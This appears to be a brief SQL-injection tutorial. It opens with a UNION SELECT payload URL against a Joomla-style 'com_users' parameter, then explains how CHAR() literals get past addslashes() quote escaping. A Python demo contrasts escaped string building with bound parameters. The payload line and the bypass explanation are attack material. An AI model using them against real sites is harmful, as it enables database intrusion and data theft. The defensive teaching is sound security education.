Index.php?option=%27com_users1111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45)%20--%20

SQL's Char() function comes in handy when (for example) addslashes() is used as a precautionary measure within the SQL query. Using Char() removes the need for quotation marks within the injected query. An example of some code vulnerable to an SQL injection using Char() would look.
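The point above, as an added example that is not code from the original page: quote escaping leaves a CHAR()-built literal untouched when the value lands in a numeric context, while a bound parameter treats the whole input as data. Assumptions: SQLite's `char()` stands in for MySQL's CHAR(), the Python `addslashes` helper approximates PHP's addslashes(), and the `items` table and function names are hypothetical.

```python
import sqlite3

# Constructed sample input: the page's CHAR(...) literal placed in a numeric parameter.
PROBE = "0 UNION SELECT char(45,120,49,45,81,45)"

def addslashes(value: str) -> str:
    """Python stand-in for PHP addslashes(): escapes backslash, quotes and NUL."""
    value = value.replace("\\", "\\\\")
    for quote in ("'", '"'):
        value = value.replace(quote, "\\" + quote)
    return value.replace("\0", "\\0")

def make_db() -> sqlite3.Connection:
    """Hypothetical in-memory table used only for this demonstration."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO items VALUES (?, ?)", [(1, "widget"), (2, "gadget")])
    return db

def lookup_escaped(db: sqlite3.Connection, item_id: str) -> list:
    """Weak: escaping only touches quotes, and this value sits outside any quotes."""
    sql = "SELECT name FROM items WHERE id = " + addslashes(item_id)
    return [row[0] for row in db.execute(sql)]

def lookup_bound(db: sqlite3.Connection, item_id: str) -> list:
    """Corrected: the value is bound as data and never parsed as SQL."""
    sql = "SELECT name FROM items WHERE id = ?"
    return [row[0] for row in db.execute(sql, (item_id,))]

if __name__ == "__main__":
    db = make_db()
    print("escaping changed input:", addslashes(PROBE) != PROBE)
    print("escaped query :", lookup_escaped(db, PROBE))
    print("bound query   :", lookup_bound(db, PROBE))
    print("bound, id=1   :", lookup_bound(db, "1"))
```

The escaped query returns the decoded literal because the input contains no character that escaping acts on; the bound query returns no rows for the same input and still serves a legitimate id.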
